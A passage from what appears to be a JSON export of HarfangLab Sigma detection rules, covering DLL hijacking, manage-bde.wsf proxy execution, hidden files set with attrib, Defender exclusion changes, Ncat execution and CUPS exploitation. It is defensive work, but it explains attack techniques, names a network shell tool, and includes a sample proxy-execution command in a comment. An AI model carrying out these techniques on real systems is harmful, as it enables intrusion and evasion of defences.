"content": "title: DLL Hijacking via LogServer.exe\nid: 21e24d1c-fc56-4c13-937d-8036bd091278\ndescription: |\n Detects potential Windows DLL Hijacking via LogServer.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://www.malwarebytes.com/blog/threat-intelligence/2022/winnti-apt-group-docks-in-sri-lanka-for-new-campaign-final.pdf\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/10/26\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'LogServer'\n ProcessSignature: 'Trend Micro, Inc.'\n ImageLoaded|endswith: '\\ofcpipc.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files\\Trend Micro\\'\n - '?:\\Program Files (x86)\\Trend Micro\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Program Files\\Trend Micro\\'\n - '?:\\Program Files (x86)\\Trend Micro\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Trend Micro, Inc.'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "21e24d1c-fc56-4c13-937d-8036bd091278",
"rule_name": "DLL Hijacking via LogServer.exe",
"rule_description": "Detects potential Windows DLL Hijacking via LogServer.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-10-26",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "2216764d-df8a-4e07-bb45-54a387f5b02b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.070621Z",
"creation_date": "2026-03-23T11:45:34.070624Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.070630Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://lolbas-project.github.io/lolbas/Scripts/Manage-bde/",
"https://attack.mitre.org/techniques/T1216/"
],
"name": "t1216_manage_bde_wsf_execution.yml",
"content": "title: Suspicious Proxy Execution via manage-bde.wsf\nid: 2216764d-df8a-4e07-bb45-54a387f5b02b\ndescription: |\n Detects the malicious execution of the legitimate manage-bde.wsf script to proxy execution of malicious binaries through the hijacking of the manage-bde.exe binary.\n The goal is to plant a manage-bde.exe binary in the current directory to execute it rather than the legitimate binary in System32.\n Attackers may abuse it to bypass security restrictions.\n This script which is used to manage BitLocker and has been deprecated since Windows 7 while manage-bde.exe should be used instead.\n It is recommended to analyze the process responsible for the execution of the manage-bde.wsf script to look for malicious content and other suspicious actions.\nreferences:\n - https://lolbas-project.github.io/lolbas/Scripts/Manage-bde/\n - https://attack.mitre.org/techniques/T1216/\ndate: 2022/01/27\nmodified: 2025/01/09\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1216\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.ManageBDE\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n # set comspec=c:\\windows\\system32\\calc.exe & cscript c:\\windows\\system32\\manage-bde.wsf\n selection:\n ParentImage|endswith: '\\cscript.exe'\n ParentCommandLine|contains: 'manage-bde.wsf'\n\n exclusion_normal_execution:\n Image: '?:\\Windows\\System32\\cmd.exe'\n CommandLine: '?:\\Windows\\system32\\cmd.exe /c manage-bde.exe -legacy_Vista*'\n\n condition: selection and not 1 of exclusion_*\nlevel: critical\n# level: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "2216764d-df8a-4e07-bb45-54a387f5b02b",
"rule_name": "Suspicious Proxy Execution via manage-bde.wsf",
"rule_description": "Detects the malicious execution of the legitimate manage-bde.wsf script to proxy execution of malicious binaries through the hijacking of the manage-bde.exe binary.\nThe goal is to plant a rogue manage-bde.exe binary in the current directory so that it is executed instead of the legitimate binary in System32.\nAttackers may abuse it to bypass security restrictions.\nThis script, which is used to manage BitLocker, has been deprecated since Windows 7; manage-bde.exe should be used instead.\nIt is recommended to analyze the process responsible for the execution of the manage-bde.wsf script to look for malicious content and other suspicious actions.\n",
"rule_creation_date": "2022-01-27",
"rule_modified_date": "2025-01-09",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1216"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "222c898a-8fe8-430e-9b10-8075c5f1ca5c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.620258Z",
"creation_date": "2026-03-23T11:45:34.620260Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.620264Z",
"rule_level": "low",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://thedfirreport.com/2021/01/18/all-that-for-a-coinminer/",
"https://attack.mitre.org/techniques/T1564/001/"
],
"name": "t1564_001_file_hidden_through_attrib.yml",
"content": "title: File or Directory Hidden via Attrib.exe\nid: 222c898a-8fe8-430e-9b10-8075c5f1ca5c\ndescription: |\n Detects when files/directories are set as Hidden and System through using attrib.exe.\n This technique can be used by an attacker to hide sensitives directories and/or tools.\n It is recommended to examine the process tree associated with this process to understand the execution context and to determine the legitimacy of this action.\nreferences:\n - https://thedfirreport.com/2021/01/18/all-that-for-a-coinminer/\n - https://attack.mitre.org/techniques/T1564/001/\ndate: 2020/12/04\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1564.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n Image: '*\\attrib.exe'\n CommandLine|contains|all:\n - '+h' # hidden\n - '+s' # system\n\n exclusion_desktop_ini:\n # attrib +s +h C:\\3DEXPERIENCE/desktop.ini\n CommandLine|endswith:\n - '/desktop.ini'\n - '\\desktop.ini'\n\n exclusion_template_gpscript:\n ProcessAncestors|contains: '?:\\Windows\\System32\\gpscript.exe|?:\\Windows\\System32\\svchost.exe'\n\n exclusion_samsung_link:\n CommandLine|contains: '?:\\ProgramData\\Samsung\\Samsung Link\\SamsungLink.lock'\n\n exclusion_samsung_link_tray:\n CommandLine|contains: 'AppData\\Roaming\\SAMSUNG\\Samsung Link\\ASPAgent.lock'\n\n exclusion_intel_gfx_cui:\n # Intel Common User Interface GFX execute a bat that hides all cui files in 'C:\\Windows\\System32\\'\n #GrandparentImage: '?:\\Windows\\System32\\igfxCUIService.exe'\n ParentCommandLine: '?:\\Windows\\system32\\cmd.exe /c ?:\\Windows\\system32\\{????????-????-????-????-????????????}.bat'\n CommandLine:\n - 'attrib *+R +H +S +A ?.cui'\n # Workaround for issue 18 (fixed in 2.8.1 and upper)\n - 'attrib +R +H +S +A ?.cui'\n - 'attrib +R +H +S +A ?.cui'\n\n exclusion_razer:\n CommandLine: 
'attrib +h +s ?:\\Users\\\\*\\AppData\\Local\\Razer\\RazerAxon\\WallpaperSource\\\\*'\n GrandparentImage: '?:\\Program Files (x86)\\Razer\\Razer Axon\\RazerAxon.exe'\n\n exclusion_syngo:\n CommandLine: '?:\\Windows\\system32\\attrib.exe +s +h \\\\.\\GLOBALROOT\\device\\harddisk0\\partition3\\Recovery\\WindowsRE\\winre.wim'\n ParentCommandLine: 'powershell.exe -ExecutionPolicy Bypass -command try{.\\InstallRAIDdriver.ps1 ?:\\Store\\Log\\Installation\\FieldUpdater\\\\*\\; exit $lastexitcode}catch{echo Exception-message: $_.Exception.Message;exit 1}'\n\n # https://gist.github.com/pknowledge/1feef32fa21475eb9742ea247aefe1af\n exclusion_folder_private:\n CommandLine: 'attrib +h +s Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}'\n ParentCommandLine: '?:\\WINDOWS\\system32\\cmd.exe /c ?:\\\\*.bat'\n\n exclusion_hp:\n CommandLine:\n - 'attrib +r +h +s ?:\\hp'\n - 'attrib +r +h +s ?:\\system.sav'\n ParentCommandLine: '?:\\Windows\\System32\\cmd.exe /c ?:\\system.sav\\logs\\RunFLC.cmd'\n GrandparentImage: '?:\\Windows\\System32\\runonce.exe'\n\n exclusion_blackmagic:\n CommandLine: 'attrib +h +s */auto_Uninstall.qs'\n GrandparentImage|endswith: '\\Blackmagic_Fairlight_Sound_Library_Windows.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: low\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "222c898a-8fe8-430e-9b10-8075c5f1ca5c",
"rule_name": "File or Directory Hidden via Attrib.exe",
"rule_description": "Detects when files or directories are set as Hidden and System using attrib.exe.\nThis technique can be used by an attacker to hide sensitive directories and/or tools.\nIt is recommended to examine the process tree associated with this process to understand the execution context and to determine the legitimacy of this action.\n",
"rule_creation_date": "2020-12-04",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1564.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "224d53d5-5b47-46d6-bae7-c97ed2c94fed",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.093020Z",
"creation_date": "2026-03-23T11:45:34.093022Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.093027Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_srtasks.yml",
"content": "title: DLL Hijacking via srtasks.exe\nid: 224d53d5-5b47-46d6-bae7-c97ed2c94fed\ndescription: |\n Detects potential Windows DLL Hijacking via srtasks.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'srtasks.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\bcd.dll'\n - '\\ktmw32.dll'\n - '\\SPP.dll'\n - '\\SRCLIENT.dll'\n - '\\SRCORE.dll'\n - '\\VSSAPI.DLL'\n - '\\VssTrace.DLL'\n - '\\wer.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "224d53d5-5b47-46d6-bae7-c97ed2c94fed",
"rule_name": "DLL Hijacking via srtasks.exe",
"rule_description": "Detects potential Windows DLL Hijacking via srtasks.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "22822193-9f29-4f1e-8001-93546cec1e4a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.610942Z",
"creation_date": "2026-03-23T11:45:34.610945Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.610953Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/",
"https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/",
"https://attack.mitre.org/techniques/T1562/001/"
],
"name": "t1562_001_windows_defender_add_exclusion.yml",
"content": "title: Windows Defender Exclusion List Modified\nid: 22822193-9f29-4f1e-8001-93546cec1e4a\ndescription: |\n Detects the modification of Windows Defender's exclusion list.\n Adversaries may modify the exclusion list to avoid possible detection of their tools.\n It is recommended to ensure this new exclusion is legitimate as well as to look for other suspicious actions on the affected host.\nreferences:\n - https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/\n - https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/\n - https://attack.mitre.org/techniques/T1562/001/\ndate: 2020/09/25\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.001\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.ImpairDefenses\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject|startswith:\n # NOTE: Even when using PowerShell (via Add-MpPreference), msmpeng is always the one doing this operation.\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Extensions\\'\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Paths\\'\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Processes\\'\n\n filter_empty:\n Details: '(Empty)'\n\n exclusion_hurukai:\n TargetObject:\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Processes\\\\?:\\Program Files\\HarfangLab'\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Processes\\\\?:\\Program Files\\HarfangLab\\\\*'\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Paths\\\\?:\\Program Files\\HarfangLab'\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Paths\\\\?:\\Program Files\\HarfangLab\\\\*'\n Details: 'DWORD (0x00000000)'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "22822193-9f29-4f1e-8001-93546cec1e4a",
"rule_name": "Windows Defender Exclusion List Modified",
"rule_description": "Detects the modification of Windows Defender's exclusion list.\nAdversaries may modify the exclusion list to avoid possible detection of their tools.\nIt is recommended to ensure this new exclusion is legitimate as well as to look for other suspicious actions on the affected host.\n",
"rule_creation_date": "2020-09-25",
"rule_modified_date": "2025-04-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1112",
"attack.t1562.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "228c8306-0e42-40a0-89b5-bdbf8a539ddb",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.604822Z",
"creation_date": "2026-03-23T11:45:34.604826Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.604833Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://nmap.org/ncat/",
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md#atomic-test-2---netcat-c2",
"https://attack.mitre.org/techniques/T1049/",
"https://attack.mitre.org/techniques/T1095/"
],
"name": "t1049_ncat.yml",
"content": "title: Ncat Execution\nid: 228c8306-0e42-40a0-89b5-bdbf8a539ddb\ndescription: |\n Detects the execution of Ncat, a feature-packed networking utility which reads and writes data across networks from command-line.\n Ncat was written for the Nmap Project as a much-improved reimplementation of Netcat.\n Attackers can use ncat to perform malicious activities such as reconnaissance, lateral movement, reverse shell, etc.\n It is recommended to analyze the parent process and context as well as to correlate this alert with other discovery commands executed around it.\nreferences:\n - https://nmap.org/ncat/\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md#atomic-test-2---netcat-c2\n - https://attack.mitre.org/techniques/T1049/\n - https://attack.mitre.org/techniques/T1095/\ndate: 2022/08/17\nmodified: 2025/01/31\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1049\n - attack.command_and_control\n - attack.t1095\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Tool.Ncat\n - classification.Windows.Behavior.Discovery\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n # by default Ncat is signed by Insecure.Com LLC\n Imphash: '424b839c413b54caf852f99fc5055a49'\n\n condition: selection\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "228c8306-0e42-40a0-89b5-bdbf8a539ddb",
"rule_name": "Ncat Execution",
"rule_description": "Detects the execution of Ncat, a feature-packed networking utility which reads and writes data across networks from command-line.\nNcat was written for the Nmap Project as a much-improved reimplementation of Netcat.\nAttackers can use ncat to perform malicious activities such as reconnaissance, lateral movement, reverse shell, etc.\nIt is recommended to analyze the parent process and context as well as to correlate this alert with other discovery commands executed around it.\n",
"rule_creation_date": "2022-08-17",
"rule_modified_date": "2025-01-31",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1049",
"attack.t1095"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "22e5297e-5d7b-4785-82f5-62dea6132903",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.602458Z",
"creation_date": "2026-03-23T11:45:34.602461Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.602469Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_printbrmui.yml",
"content": "title: DLL Hijacking via printbrmui.exe\nid: 22e5297e-5d7b-4785-82f5-62dea6132903\ndescription: |\n Detects potential Windows DLL Hijacking via printbrmui.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'printbrmui.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\IPHLPAPI.DLL'\n - '\\PROPSYS.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "22e5297e-5d7b-4785-82f5-62dea6132903",
"rule_name": "DLL Hijacking via printbrmui.exe",
"rule_description": "Detects potential Windows DLL Hijacking via printbrmui.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "2307c08f-aa49-4fa1-a3d5-d2a849e2bf17",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.625154Z",
"creation_date": "2026-03-23T11:45:34.625156Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.625160Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.evilsocket.net/2024/09/26/Attacking-UNIX-systems-via-CUPS-Part-I/",
"https://gist.github.com/stong/c8847ef27910ae344a7b5408d9840ee1",
"https://www.elastic.co/security-labs/cups-overflow",
"https://attack.mitre.org/techniques/T1203/"
],
"name": "cve_2024_47177_cupsd_foomatic_rip_shell_execution.yml",
"content": "title: CUPS CVE-2024-47177 Vulnerability Exploited\nid: 2307c08f-aa49-4fa1-a3d5-d2a849e2bf17\ndescription: |\n Detects the suspicious creation of child processes by the foomatic-rip process related to the exploitation of the CUPS (Common UNIX Printing System) vulnerability.\n This detection rule is related to multiple vulnerabilities in the CUPS printing system, including CVE-2024-47176, CVE-2024-47076, CVE-2024-47175, and CVE-2024-47177.\n These flaws allow for remote unauthenticated attackers to manipulate IPP URLs or inject malicious data through crafted UDP packets or network spoofing.\n This can result in arbitrary command execution when a print job is initiated.\n It is recommended to investigate the command-line performing this action to determine its legitimacy.\nreferences:\n - https://www.evilsocket.net/2024/09/26/Attacking-UNIX-systems-via-CUPS-Part-I/\n - https://gist.github.com/stong/c8847ef27910ae344a7b5408d9840ee1\n - https://www.elastic.co/security-labs/cups-overflow\n - https://attack.mitre.org/techniques/T1203/\ndate: 2024/10/02\nmodified: 2025/12/17\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1203\n - cve.2024-47177\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Exploit.CUPS\n - classification.Linux.Exploit.CVE-2024-47177\nlogsource:\n product: linux\n category: process_creation\ndetection:\n selection:\n 